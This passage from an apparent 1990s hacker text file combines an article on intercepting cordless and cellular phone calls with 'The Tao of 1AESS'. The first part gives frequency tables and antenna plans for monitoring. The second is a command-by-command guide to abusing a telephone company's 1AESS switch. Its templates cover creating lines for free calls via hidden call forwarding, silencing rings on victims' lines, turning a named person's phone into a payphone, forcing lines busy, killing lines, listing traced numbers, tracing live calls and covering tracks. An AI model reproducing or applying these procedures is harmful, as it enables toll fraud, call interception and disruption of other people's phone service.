  1456. be able to decipher the digital communications, and it is unlikely
  1457. that digital-capable scanners will be produced.  That means it will
  1458. be up to the hackers to provide the technology to intercept these
  1459. communications.  Spread spectrum is quite hackable, as it was never
  1460. intended as an encryption system, per se, yet the phone
  1461. manufacturers are certainly marketing it as such.  And one oft
  1462. overlooked advantage of the Clipper chip is the fact that the
  1463. backdoor can be exploited by hackers as well as the government.
  1464. In the meanwhile, there are plenty of intercepts to be had, and
  1465. there will continue to be.
  1466.  
  1467.  
  1468. =================================================================
  1469.  
  1470. For More Information:
  1471. =================================================================
  1472.  
  1473. Scanner Modification Handbook (Vols. I & II), by Bill Cheek
  1474. The scanner modification handbooks offer a plethora of information
  1475. on hacking scanners.  Hacks include: increased channel capacity
  1476. (example: RS PRO-2006 from 400 channels to 6,400!), adding signal-
  1477. strength meters, cellular-freq. restoration, scanning-speed
  1478. increases, and much more.
  1479.  
  1480. World Scanner Report, by Bill Cheek
  1481. A monthly newsletter on the latest scanner hacks.
  1482.  
  1483. Available from:
  1484. COMMtronics Engineering
  1485. Box 262478
  1486. San Diego, CA 82196-2478
  1487. BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!)
  1488.  
  1489. COMMtronics Engineering also offers a scanner-computer interface
  1490. for RS PRO-43/2004/2005/2006 model scanners.
  1491. ===================================================================
  1492. CRB Research Books
  1493. Box 56
  1494. Commack, MY 11725
  1495.  
  1496. CRB has books on scanner modifications, frequency guides, and other
  1497. interesting subjects.
  1498. =================================================================
  1499. POPULAR COMMUNICATIONS
  1500.  
  1501. CQ Publications
  1502. 76 N. Broadway
  1503. Hicksville, NY 11801
  1504. (516) 681-2926
  1505.  
  1506. Pop Comm is a monthly magazine on all sorts of radio monitoring,
  1507. including scanning, shortwave, and broadcast.
  1508. ==================================================================
  1509. MONITORING TIMES
  1510.  
  1511. Grove Enterprises, Inc.
  1512. P.O. Box 98,
  1513. 300 S. Highway 64 West
  1514. Brasstown, North Carolina 28902-0098
  1515.  
  1516. M.T. is a monthly magazine covering all varieties of radio
  1517. communications.
  1518.  
  1519. ==================================================================
  1520. NUTS & VOLTS
  1521. Nuts & Volts is a monthly magazine that covers a wide variety of
  1522. electronic-related subjects.
  1523.  
  1524. T&L Publications, Inc.
  1525. 430 Princeland Court
  1526. Corona, CA 91719
  1527. (909) 371-8497
  1528. (909) 371-3052 fax
  1529. CI$ 74262,3664
  1530. 1-800-783-4624 SUBSCRIPTION ORDERS ONLY
  1531. ===================================================================
  1532. USENET:
  1533. alt.radio.scanner
  1534. rec.radio.scanner
  1535. ===================================================================
  1536.  
  1537. Charts & Tables:
  1538.  
  1539. 1. Cordless Telephone Frequencies (VHF)
  1540. 2. Cordless Telephone Frequencies (900MHz)
  1541. 3. Cellular Telephone Frequencies
  1542. 4. Business Band Frequencies (VHF, UHF, 800MHz)
  1543. 5. IMTS Frequencies
  1544. 6. PAGER Frequencies
  1545. 7. PACKET Frequencies
  1546. 8. ROOM MONITOR Frequencies
  1547. 9. homebrew cordless dipole antenna
  1548. 10. homebrew 1/4 wave groundplane antenna
  1549.  
  1550.  
  1551. =================================================================
  1552. TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL)
  1553.  
  1554. CH   BASE      HANDSET
  1555. --   ----      -------
  1556.  1   46.100    49.670
  1557.  2   46.630    49.845
  1558.  3   46.670    49.860
  1559.  4   46.710    49.770
  1560.  5   46.730    49.875
  1561.  6   46.770    49.830
  1562.  7   46.830    49.890
  1563.  8   46.870    49.930
  1564.  9   46.930    49.990
  1565. 10   46.970    46.970
  1566. =================================================================
  1567. TABLE 2 - 900MHz CORDLESS FREQS.
  1568.  
  1569. Cordless phones have been allocated the frequencies
  1570. between 902-228MHz, with channel spacing between
  1571. 30-100KHz.
  1572. Following are some examples of the frequencies used by phones
  1573. currently on the market.
  1574.  
  1575. ----------------------------------------------------------------
  1576. Panasonic KX-T9000 (60 Channels)
  1577. base     902.100 - 903.870 Base frequencies (30Khz spacing)
  1578. handset  926.100 - 927.870 Handset frequencies
  1579. CH   BASE    HANDSET    CH   BASE    HANDSET    CH   BASE   HANDSET
  1580. --  -------  -------    --  -------  -------    --  ------- -------
  1581. 01  902.100  926.100    11  902.400  926.400    21  902.700 926.700
  1582. 02  902.130  926.130    12  902.430  926.430    22  902.730 926.730
  1583. 03  902.160  926.160    13  902.460  926.460    23  902.760 926.760
  1584. 04  902.190  926.190    14  902.490  926.490    24  902.790 926.790
  1585. 05  902.220  926.220    15  902.520  926.520    25  902.820 926.820
  1586. 06  902.250  926.250    16  902.550  926.550    26  902.850 926.850
  1587. 07  902.280  926.280    17  902.580  926.580    27  902.880 926.880
  1588. 08  902.310  926.310    18  902.610  926.610    28  902.910 926.910
  1589. 09  902.340  926.340    19  902.640  926.640    29  902.940 926.940
  1590. 10  902.370  926.370    20  902.670  926.670    30  902.970 926.970
  1591.  
  1592. 31  903.000  927.000    41  903.300  927.300    51  903.600 927.600
  1593. 32  903.030  927.030    42  903.330  927.330    52  903.630 927.630
  1594. 33  903.060  927.060    43  903.360  927.360    53  903.660 927.660
  1595. 34  903.090  927.090    44  903.390  927.390    54  903.690 927.690
  1596. 35  903.120  927.120    45  903.420  927.420    55  903.720 927.720
  1597. 36  903.150  927.150    46  903.450  927.450    56  903.750 927.750
  1598. 37  903.180  927.180    47  903.480  927.480    57  903.780 927.780
  1599. 38  903.210  927.210    48  903.510  927.510    58  903.810 927.810
  1600. 39  903.240  927.240    49  903.540  927.540    59  903.840 927.840
  1601. 40  903.270  927.270    50  903.570  927.570    60  903.870 927.870
  1602.  
  1603. ------------------------------------------------------------
  1604.  
  1605. V-TECH TROPEZ DX900 (20 CHANNELS)
  1606. 905.6 - 907.5   TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
  1607. 925.5 - 927.4   HANDSET FREQUENCIES
  1608.  
  1609. CH   BASE    HANDSET    CH   BASE    HANDSET    CH   BASE   HANDSET
  1610. --  -------  -------    --  -------  -------    --  ------- -------
  1611. 01  905.600  925.500    08  906.300  926.200    15  907.000 926.900
  1612. 02  905.700  925.600    09  906.400  926.300    16  907.100 927.000
  1613. 03  905.800  925.700    10  906.500  926.400    17  907.200 927.100
  1614. 04  905.900  925.800    11  906.600  926.500    18  907.300 927.200
  1615. 05  906.000  925.900    12  906.700  926.600    19  907.400 927.300
  1616. 06  906.100  926.000    13  906.800  926.700    20  907.500 927.400
  1617. 07  906.200  926.100    14  906.900  926.800
  1618.  
  1619. ------------------------------------------------------------
  1620. OTHER 900 MHZ CORDLESS PHONES
  1621. AT&T #9120  - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ
  1622. OTRON CORP. #CP-1000  902.1 - 903.9 & 926.1 - 927.9 MHZ
  1623. SAMSUNG #SP-R912- - - 903.0         &         927.0 MHZ
  1624.  
  1625. ------------------------------------------------------------
  1626. ==================================================================
  1627. TABLE 3 - CELLULAR TELEPHONE FREQUENCIES
  1628. wireline ("b" side carrier)
  1629. 824.1000-834.9000
  1630. 869.0100-879.9900
  1631.  
  1632. non-wireline ("a" side carrier)
  1633. 835.0200-849.0000
  1634. 880.0200-894.0000
  1635.  
  1636.  
  1637. ==================================================================
  1638. TABLE 4 - BUSINESS BAND RADIO FREQS.
  1639.  
  1640. 151.5050-151.9550MHz
  1641. 154.4900-154.5400
  1642. 460.6500-462.1750
  1643. 462.7500-465.0000
  1644. 471.8125-471.3375
  1645. 474.8125-475.3375
  1646. 896.0125-900.9875
  1647. 935.0125-939.9875
  1648. 806.0125-810.9875
  1649. 811.0125-815.9875
  1650. 816.0125-820.9875
  1651. 851.0125-855.9875
  1652. 856.0125-860.9875
  1653. 861.0125-865.9875
  1654. =================================================================
  1655. TABLE 5 - MOBILE TELEPHONE FREQS. (see note1 below)
  1656. SIMPLEX             OUTPUT    INPUT       OUTPUT    INPUT
  1657. --------            --------  --------    --------  --------
  1658. 035.2600            152.0300  158.4900    454.3750  459.3750
  1659. 035.3000            152.0600  158.5200    454.4000  459.4000
  1660. 035.3400            152.0900  158.5500    454.4250  459.4250
  1661. 035.3800            152.1200  158.5800    454.4500  459.4500
  1662. 035.5000            152.1500  158.6100    454.4750  459.4750
  1663. 035.5400            152.1800  158.6400    454.5000  459.5000
  1664. 035.6200            152.2100  158.6700    454.5250  459.5250
  1665. 035.6600*           454.0250  459.0250    454.5500  459.5500
  1666. 043.2200*           454.0500  459.0500    454.5750  459.5750
  1667. 043.2600            454.0750  459.0750    454.6000  459.6000
  1668. 043.3400            454.1000  459.1000    454.6250  459.6250
  1669. 043.3800            454.1250  459.1250    454.6500  459.6500
  1670. 043.4200            454.1500  459.1500
  1671. 043.3000            454.1750  459.1750
  1672. 043.5000            454.2000  459.2000
  1673. 043.5400            454.2250  459.2250
  1674. 043.5800*           454.2500  459.2500
  1675. 043.6400*           454.2750  459.2750
  1676. 152.2400*           454.3000  459.3000
  1677. 152.8400*           454.3250  459.3250
  1678. 158.1000*           454.3500  459.3500
  1679. 158.7000*
  1680.  
  1681. *-also allocated for pager usage
  1682.  
  1683. (note1: These freqs are, for the most part, dead.  The FCC has
  1684. reallocated most of these for other services.)
  1685.  
  1686. =================================================================
  1687. TABLE 6 - PAGER FREQUENCIES
  1688. 035.2200     035.5800     152.4800     154.6250     158.4600
  1689. 157.7400     465.0000     462.8000     462.7750     462.9250
  1690. 462.7500     462.8750     462.8250     462.9000     462.8500
  1691. 928.0000     929.0000     930.0000     931.0000
  1692. =================================================================
  1693. TABLE 7 - PACKET FREQUENCIES
  1694. 050.6200
  1695. 223.5200-223.6400
  1696. 223.7100-223.8500
  1697. 2303.500-2303.800
  1698. 2303.900
  1699. 2399.000-2399.500
  1700. =================================================================
  1701. TABLE 8 - BABY MONITOR FREQUENCIES
  1702. 49.300
  1703. 49.830
  1704. 49.845
  1705. 49.890
  1706. =================================================================
  1707. TABLE 9 - AIR PHONE FREQUENCIES
  1708. OUTPUT   INPUT
  1709. 454.6750 459.6750
  1710. 454.9750 459.9750
  1711. 849.0000 851.0000
  1712. 894.0000 896.0000
  1713. ==================================================================
  1714.  
  1715. CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING
  1716.  
  1717. The best way to improve the range for monitoring cordless
  1718. telephones is to use an antenna specifically cut for the
  1719. frequencies used in cordless phones.  The following is a very
  1720. effective, yet easy to build, "homebrew" antenna.
  1721.  
  1722. CORDLESS DIPOLE
  1723. ---------------
  1724. materials needed:
  1725. wire - virtually any type will suffice
  1726. matching transformer (RS part number 15-1296)
  1727. f connector (RS part number 278-225)
  1728. ??? connector (this will connect the antenna to the scanner, so it
  1729.      will be dependant upon what type of antenna jack the scanner
  1730.      utilizes.  Most use a BNC-type connector.  Some older models
  1731.      will use a Motorola-type connector.)
  1732. coax cable - while many types of coax can be used, a low-loss cable
  1733.      would be best, especially if a long cable run is required.
  1734.      RG-6 satellite coax (RS part number 278-1316) is a good choice.
  1735.  
  1736.  
  1737.         wire              transformer            wire
  1738.      -------------------------< >-------------------------
  1739.                                +  f connector
  1740.                                |
  1741.                                |  coax
  1742.                                |
  1743.                                |
  1744.                                *  connector
  1745.                               [ ] scanner
  1746.  
  1747. =================================================================
  1748.  
  1749. CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA
  1750.  
  1751. Here is a simple-to-build antenna that will improve reception for
  1752. a particular frequency area.
  1753.  
  1754. materials needed:
  1755. wire - a rigid wire is needed here.  Clothes hangers work well.
  1756. panel mount SO-239 connector (RS part number 278-201)
  1757. male PL-259 connector (RS part number 278-205)
  1758. coax cable
  1759. connector (to scanner)
  1760.  
  1761.  
  1762.                            |
  1763.                            |
  1764.                            |
  1765.                            |
  1766.                           [ ]
  1767.                         /     \
  1768.                       /         \
  1769.                     /             \
  1770.  
  1771.  
  1772. The length of the five rods will be dependant upon the frequency
  1773. you intend to monitor.  Use the following formula:
  1774.  
  1775. WL=3X10^8/F
  1776.  
  1777. WL = wavelegnth (in meters)
  1778. F  = frequency (in MHz)
  1779.  
  1780.  
  1781. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  1782.  
  1783.  
  1784.  
  1785.                                     -=-
  1786.  
  1787.                            -= The Tao of 1AESS =-
  1788.                               -=-=-=-=-=-=-=-=
  1789.                            -= DeadKat&Disorder =-
  1790.  
  1791.                                     -=-
  1792.  
  1793.                 -= Special thanks to Gatsby and Mark Tabas =-
  1794.  
  1795.  
  1796. Introduction
  1797. -=-=-=-=-=-=
  1798. The Bell System's first trial of electronic switching took place in Morris,
  1799. Illinois, in 1960.  The Morris trial culminated a 6-year development and
  1800. proved the viability of the stored-program control concept.  The first
  1801. application of electronic local switching in the Bell System occurred in May
  1802. 1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
  1803.  
  1804. The 1ESS switching system was designed for use in areas where large numbers
  1805. of lines and lines with heavy traffic (primarily business customers) are
  1806. served.  The system has generally been used in areas serving between 10,000
  1807. and 65,000 lines and has been the primary replacement system for urban
  1808. step-by-step and panel systems.  The ease and flexibility of adding new
  1809. services made 1ESS switching equipment a natural replacement vehicle in
  1810. city applications where the demand for new, sophisticated business and
  1811. residence services is high.
  1812.  
  1813. In 1976, the first electronic toll switching system to operate a digital
  1814. time-division switching network under stored-program control, the 4ESS
  1815. system, was placed in service.  It used a new control, the 1A processor,
  1816. for the first time to gain a call carrying capacity in excess of 550,000
  1817. busy-hour calls.  The 1A processor was also designed for local switching
  1818. application.  It doubled the call-carrying capacity of the 1ESS switching
  1819. system and was introduced in 1976 in the first 1AESS switch.  The network
  1820. capacity of 1ESS switching equipment was also doubled to allow the 1AESS
  1821. switch to serve 130,000 lines.
  1822.  
  1823. In addition to local telephone service, the 1AESS switches offer a variety
  1824. of special services.  Custom Local Area Switching Services (CLASS) are
  1825. available as well Custom Calling Services.  Business customers may select
  1826. offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
  1827. Service, or electronic tandem switching.
  1828.  
  1829. Although more modern switches like 5ESS and DMS 200 have been developed, it
  1830. is estimated that some 50 percent of all switches are still 1AESS.
  1831.  
  1832. Commands
  1833. -=-=-=-=
  1834. The 1AESS uses a command line interface for all commands.  The commands are
  1835. divided into three fields:  action, identification, and data.  The fields
  1836. are always separted by a colon.  Every command is terminated by either a
  1837. period for verification commands or a 'ballbat' (!) for change commands.
  1838. The control-d is used to execute the command instead of a return.  The
  1839. underscore is used as a backspace.  Commands are always typed in 'all caps'.
  1840.  
  1841. The action field is the first field of the command and is ended by a colon.
  1842. The identification field is ended by the second colon.  The identification
  1843. field has one or two subfields which are separated by a semicolon.  Semicolons
  1844. are not used elsewhere in the command.  The data field consists of keyword
  1845. units and is the remaining portion of the command.
  1846.  
  1847. Basic Machine Commands
  1848. -=-=-=-=-=-=-=-=-=-=-=
  1849. These commands provide useful information from the system.  The WHO-RV-
  1850. command will tell you what CO it is and what version of the OS is installed.
  1851. If your output is scrolling off the screen press space to end scrolling.
  1852. The V-STOP- command will clear the buffer.
  1853.  
  1854. WHO-RV-.                  System information.
  1855. SPACE                     Stops output from scrolling.
  1856. V-STOP-.                  Free buffer of remaining LENS/INFO.
  1857.  
  1858. Channel Commands
  1859. -=-=-=-=-=-=-=-=
  1860. Channel commands are used to redirect input and output.  If a switch won't
  1861. respond to a command use the OP:CHAN command to check on current channel.
  1862. If your channel is not responding, use the MON:CHAN command to switch output
  1863. and control to your terminal (the remote).  You can check the status of the
  1864. RC with the RCCENSUS command.
  1865.  
  1866. OP:CHAN:MON!                   Shows all channels which are being monitored.
  1867. MON:CHAN SC1;CHAN LOC!         Redirect output to remote screen.
  1868. STOP: MON;CHAN SC1;CHAN LOC!   Redirect output to local screen.
  1869.                                (This command needs to be done after you
  1870.                                are finished to help cover your tracks)
  1871. OP:RCCENSUS!                   To see recent change status.
  1872.  
  1873.  
  1874. Tracing Commands
  1875. -=-=-=-=-=-=-=-=
  1876. CI-LIST- will give you a list of all numbers which are being traced
  1877. externally.  It will not show you lines which are being traced
  1878. internally, ie: numbers inside one of the prefixes controlled
  1879. by the switch you are on.
  1880.  
  1881. CI-LIST-.                 Traced line list.
  1882.  
  1883.  
  1884. Check Features on Line
  1885. -=-=-=-=-=-=-=-=-=-=-=
  1886. The VF command is used to check the current settings on a line.
  1887. The DN XXXXXXX specifies the phone number of the line you wish to check.
  1888. Replace XXXXXXX with the seven digit phone number of the line you are
  1889. checking.
  1890.  
  1891. VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC!       Check features of a line.
  1892. VF:DNSVY:DN XXXXXXX,1,LASFTRS!          Display last Features
  1893.  
  1894.           Call Features   CWT- Call Waiting
  1895.                           CFB- Call Forward Busy - Busy=VM
  1896.                           CFV- Call Forwarding Variable
  1897.                           CFD- Call Forward Don't answer
  1898.                           TWC- Three Way Calling
  1899.                           TTC- Touch Tone
  1900.                           RCY- Ring Cycle
  1901.                           SC1- Speed Calling 1
  1902.                           SC2- Speed Calling 2
  1903.                           UNA- No Long Distance
  1904.                           PXX- Block all LD service (guess)
  1905.                           MWI- Message Waiting Indicator
  1906.                           CHD- centrex(unremarkable)
  1907.                           CPU- centrex(unremarkable)
  1908.                           CLI- Calling Line Identification (CID)
  1909.                           ACB- Automatic Call Back Feature (?)
  1910.                           BLN- Special Toll Billing
  1911.                           FRE- Free Calling
  1912.  
  1913. The standard output of a command appears below.  The 'DN 348 2141' specifies
  1914. the number you are checking.  The calling features will be listed on the
  1915. second line by their three letter acronyms.  This line has call waiting
  1916. (CWT), a trace (TRC), and touch tone dialing (TTC).
  1917.  
  1918. Example of 1A output:
  1919.  
  1920. M 53 TR75 2 DN 348 2141 00000003
  1921.               CWT  TRC  TTC
  1922.  
  1923.  
  1924. Searching For Free Lines
  1925. -=-=-=-=-=-=-=-=-=-=-=-=
  1926. The VFY command can be used to check if a line is in use.  The output will
  1927. list the LEN (Line Equipment Number) for the line and its call features in
  1928. octal.  If the LEN is all zeros, then that number has not been assigned.
  1929. Replace XXXXXXX with the number you wish to check.  You must prefix the
  1930. phone number with 30.  You can also check for unused LEN's using the VFY
  1931. command.  Use the space bar to stop scrolling and the V-STOP command to
  1932. cancel when looking up free LEN's.
  1933.  
  1934. VFY-DN-30XXXXXXX.               Search for free lines.
  1935. VFY-LEN-4100000000.             List all free LENs.
  1936. VFY-TNN-XXXXXXXX.               To get information on trunk.
  1937.  
  1938. The output for the VFY-DN command will appear like the one below.  Notice
  1939.  
  1940. that this number has been assigned a LEN so it is in use.
  1941.  
  1942. M 06 TR01 796 9146
  1943.          0 0 0 0
  1944.          LEN 01 025 000
  1945.          001 000 000 000 000 000 4
  1946.          000 000 000 000 000 000 000 000
  1947.          0 0 0 0
  1948.          0 0 0 0 0
  1949.  
  1950.  
  1951. Searching for a Particular Feature on a Line (like trace)
  1952. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1953. All line information is stored in the switch for its coverage area.  The
  1954. switch is like a huge database in this sense.  You can do global searches
  1955. on the switch for any feature.  One especially interesting feature to search
  1956. for are traced numbers.  Traced numbers listed this way are INTERNALLY
  1957. traced as opposed to globally traced numbers shown with the CI-LIST- command.
  1958. Global and internal trace lists are always very different.  And remember,
  1959. be a good samaritan and call the person being traced and let them know!  ;-)
  1960.  
  1961. VF:DNSVY:FEATRS,EXMATCH TRACE!          Pull all numbers IN switch area with
  1962.                                         trace on it (takes a sec).
  1963.  
  1964. You can exmatch for any LASS feature by replacing the keyword TRACE with any
  1965. call feature like call forwarding (CFB) and speed calling (SC1).
  1966.  
  1967.  
  1968. To See What Numbers Are on a Speed Calling List
  1969. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1970. Another nice use for the VFY command is to see what is on a line's speed
  1971. calling list.  Replace XXXXXXX with the target phone number.  One devious
  1972. use is to look at the CO's speed call list to find other internal telco
  1973. numbers.
  1974.  
  1975. VFY-LIST-09XXXXXXX020000
  1976.          09=mask  02=single list  (one digit speed calling)
  1977.                   20=double list  (two digit speed calling)
  1978.                   28=     "                   "
  1979.                   36=     "                   "
  1980.                   44=     "                   "
  1981.  
  1982.  
  1983. To Build a Line
  1984. -=-=-=-=-=-=-=-
  1985. The recent change command (RC) is used to create and modify lines.  Because
  1986. RC commands are usually very long and complex, they are typed on multiple
  1987. lines to simplify them.  Each subfield of the data section of the command is
  1988. typed on a separate line ended by a slash (\) followed by pressing ctrl-d.
  1989. To create a line, you specify LINE in the identification field.  Before
  1990. a line can be created, you must first locate an unused number by using the
  1991. VFY-DN command explained above.  Once a free number has been found, you
  1992. use the VFY-LEN to find an available LEN.  To build a new line, follow
  1993. these steps:
  1994.  
  1995. First, find spare LEN (VFY-LEN-4100000000.).  Next find free line. Now type
  1996. in the RC commands using the following commands as a template:
  1997.  
  1998. RC:LINE:\         (create a line)
  1999. ORD 1\            (execute the command immediately)
  2000. TN XXXXXXX\       (telephone number)
  2001. LEN XXXXXXXX\     (len found from above)
  2002. LCC 1FR\          (line class code 1fr)
  2003. CFV\              (call forward)
  2004. XXX 288\          (type XXX, space, then the three digit PIC)
  2005.                    ld carrier -  222 - MCI
  2006.                                  288 - AT&T
  2007.                                  333 - Sprint, etc.)
  2008. !                 (BEWM, don't forget the ctrl-d!!)
  2009.  
  2010. (Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
  2011.  has taken affect)
  2012.  
  2013.  
  2014. Creating Call Forwarding Numbers
  2015. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2016. The call forwarding feature is the most important feature for hackers.  By
  2017. creating a line or modifying an existing line with call forwarding, you can
  2018. than use it to make free phone calls.  You set the line to call forward/
  2019. no ring and then give it the call forwarded number.  This will allow you
  2020. to call the modified line and be instantly forwarded to your pre-chosen
  2021. destination.
  2022.  
  2023. First create a line using RC:LINE:, then modify the line using the following
  2024. commands as a template.
  2025.  
  2026. RC:CFV:\          (add call forwarding to a line.. begin: )
  2027. ORD 1\            (execute the command immediately)
  2028. BASE XXXXXXX\     (base number you are changing)
  2029. TO XXXXXXX\       (local - XXXXXXX : ld - XXXXXXXXXX )
  2030. PFX\              (set prefix to 1 if ld)
  2031. !                 (BEWM)
  2032.  
  2033.  
  2034. To Change Call Forward Number
  2035. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2036. It is safer to modify an existing call forward than to create a new line
  2037. solely for this purpose.  You can use the VFY command and EXMATCH for CFB to
  2038. find lines with call forwarding.  Before you can change the call forwarding
  2039. 'TO' number you must delete the old one.  Remove call forward number using
  2040. CFV:OUT with the template below.
  2041.  
  2042. RC:CFV;OUT:\      (remove call forward number...begin: )
  2043. ORD 1\            (execute command immediately)
  2044. BASE XXXXXXX\     (number to remove it from)
  2045. !                 (Yeeee-Hahhhahah)
  2046.  
  2047.  
  2048. Make Call Forward Not Ring
  2049. -=-=-=-=-=-=-=-=-=-=-=-=-=
  2050. The only drawback to call forwarding off someone's line is if rings they
  2051. might answer.  To get around this, you add the call-forward no-ring option
  2052. (ICFRR) using the following as a template.
  2053.  
  2054. RC:LINE;CHG:\     (recent change line to be specified)
  2055. ORD 1\            (execute command immediately)
  2056. TN XXXXXXX\       (number you wanna fuck with)
  2057. ICFRR\            (this takes the ring off)
  2058. !                 (Go!)
  2059.  
  2060.  
  2061. Adding a feature to a line
  2062. -=-=-=-=-=-=-=-=-=-=-=-=-=
  2063. The RC:LINE;CHG: can also be used to add any other call feature.  Use the
  2064. same template but change the feature.
  2065.  
  2066. RC:LINE;CHG:\     (this is used for changing features)
  2067. ORD 1\            (order number)
  2068. TN XXXXXXX        (telephone number you are fucking with)
  2069. TWC\              (replace this with any feature you wish)
  2070. !                 (Fire!)
  2071.  
  2072.  
  2073. Removing a Feature
  2074. -=-=-=-=-=-=-=-=-=
  2075. Use the NO delimiter to remove a feature from a line.
  2076.  
  2077. RC:LINE;CHG:\     (change a feature)
  2078. ORD 1\            (effective immediately)
  2079. TN XXXXXXX\       (telephone number)
  2080. CFV NO\           (feature followed by NO)
  2081. !                 (Boo-Ya!)
  2082.  
  2083.  
  2084. Change Phone number into payphone
  2085. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2086. You've read about in the Hacker Crackdown, now you too can be 31337 and
  2087. change Gail Thackery's phone into a payphone.  In fact you can change the
  2088. line class code (LCC) to anything you want.  To display the LCC of a line
  2089. use the following and replace the XXXXXXX with the line you wish to view.
  2090.  
  2091. VF:DNSVY:LCC,DN XXXXXXX,1,PIC!    (display line class code)
  2092.                                    DTF = Payphone
  2093.                                    1FR = Flat Rate
  2094.                                    1MR = Measured Rate
  2095.                                    1PC = One Pay Phone
  2096.                                    CDF = DTF Coin
  2097.                                    PBX = Private Branch Exchange
  2098.                                    CFD = Coinless(ANI7) Charge-a-call
  2099.                                    INW = InWATS  (800!@#)
  2100.                                    OWT = OutWATS
  2101.                                    PBM = O HO/MO MSG REG (NO ANI)
  2102.                                    PMB = LTG = 1 HO/MO (Regular ANI6)
  2103.                                    (ani6 and ani7 - only good for DMS)
  2104.  
  2105. To change the line into a payphone use the RC:LINE;CHG command and modify
  2106. the LCC like the example below.
  2107.  
  2108. RC:LINE;CHG;\     (this is used for changing features)
  2109. ORD 1\            (order number)
  2110. TN XXXXXXX\       (telephone number you are fucking with)
  2111. LCC DTF\          (line class code you are changing to)
  2112. !                 (Make it so.)
  2113.  
  2114. *(You may have to remove some LASS features when doing this)*
  2115.  
  2116.  
  2117. To Kill a Line and Remove It Permanently
  2118. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2119. If you need to delete a line you have created (or haven't) use the following
  2120. syntax.
  2121.  
  2122. RC:LINE;OUT:\     (remove line)
  2123. ORD 1\            (effective immediately)
  2124. TN XXXXXXX\       (on this number)
  2125. !                 (GO!)
  2126.  
  2127.  
  2128. Monitoring Phone Calls
  2129. -=-=-=-=-=-=-=-=-=-=-=
  2130. There are powerful utilities to monitor calls and affect phone lines
  2131. available on a 1A.  The T-DN- commands allow you to check the current
  2132. status of line and make it busy or idle.  If a line happens to be active
  2133. you can use the NET-LINE- command to trace the call and find the numbers
  2134. for both calling parties.
  2135.  
  2136. T-DN-RD XXXXXXX.                See if call in progress.
  2137.                                         output:  =1 line busy
  2138.                                                 =0 line idle
  2139. T-DN-MB XXXXXXX.                Make line busy.
  2140. T-DN-MI XXXXXXX.                Make line idle.
  2141. NET-LINE-XXXXXXX0000.           To do a live trace on a phonenumber thru
  2142.                                 switch.
  2143. NET-TNN-XXXXXX                  Same as above for trunk trace
  2144.  
  2145. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2146.  
  2147. Appendix 1 - Common output messages seen on 1A switches
  2148. -=-=-=-=-=
  2149.  
  2150.       ** ALARM **
  2151.  
  2152. AR01  Office alarm
  2153. AR02  Alarm retired or transferred
  2154. AR03  Fuse blown
  2155. AR04  Unknown alarm scan point activated
  2156. AR05  Commercial power failure
  2157. AR06  Switchroom alarm via alarm grid
  2158. AR07  Power plant alarm
  2159. AR08  Alarm circuit battery loss
  2160. AR09  AMA bus fuse blown
  2161. AR10  Alarm configuration has been changed (retired,inhibited)
  2162. AR11  Power converter trouble
  2163. AR13  Carrier group alarm
  2164. AR15  Hourly report on building and power alarms
  2165.  
  2166.       ** AUTOMATIC TRUNK TEST **
  2167. AT01  Results of trunk test
  2168.  
  2169.       ** CARRIER GROUP **
  2170. CG01  Carrier group in alarm
  2171. CG03  Reason for above
  2172.  
  2173.       ** COIN PHONE **
  2174. CN02  List of pay phones with coin disposal problems
  2175. CN03  Possible Trouble
  2176. CN04  Phone taken out of restored service because of possible coin fraud
  2177.  
  2178.       ** COPY **
  2179. COPY  Data copied from one address to another
  2180.  
  2181.       ** CALL TRACE **
  2182. CT01  Manually requested trace line to line, information follows
  2183. CT02  Manually requested trace line to trunk, information follows
  2184. CT03  Intraoffice call placed to a number with CLID
  2185. CT04  Interoffice call placed to a number with CLID
  2186. CT05  Call placed to number on the CI list
  2187. CT06  Contents of the CI list
  2188. CT07  ACD related trace
  2189. CT08  ACD related trace
  2190. CT09  ACD related trace
  2191.  
  2192.       ** DIGITAL CARRIER TRUNK **
  2193. DCT COUNTS Count of T carrier errors
  2194.  
  2195.       ** MEMORY DIAGNOSTICS **
  2196. DGN   Memory failure in cs/ps diagnostic program
  2197.  
  2198.       ** DIGITAL CARRIER "FRAME" ERRORS **
  2199. FM01  DCT alarm activated or retired
  2200. FM02  Possible failure of entire bank not just frame
  2201. FM03  Error rate of specified digroup
  2202. FM04  Digroup out of frame more than indicated
  2203. FM05  Operation or release of the loop terminal relay
  2204. FM06  Result of digroup circuit diagnostics
  2205. FM07  Carrier group alarm status of specific group
  2206. FM08  Carrier group alarm count for digroup
  2207. FM09  Hourly report of carrier group alarms
  2208. FM10  Public switched digital capacity failure
  2209. FM11  PUC counts of carrier group errors
  2210.  
  2211.       ** MAINTENANCE **
  2212. MA02  Status requested, print out of MACII scratch pad
  2213. MA03  Hourly report of system circuits and units in trouble
  2214. MA04  Reports condition of system
  2215. MA05  Maintenance interrupt count for last hour
  2216. MA06  Scanners,network and signal distributors in trouble
  2217. MA07  Successful switch of duplicated unit (program store etc.)
  2218. MA08  Excessive error rate of named unit
  2219. MA09  Power should not be removed from named unit
  2220. MA10  OK to remove paper
  2221. MA11  Power manually removed from unit
  2222. MA12  Power restored to unit
  2223. MA13  Indicates central control active
  2224. MA15  Hourly report of # of times interrupt recovery program acted
  2225. MA17  Centrex data link power removed
  2226. MA21  Reports action taken on MAC-REX command
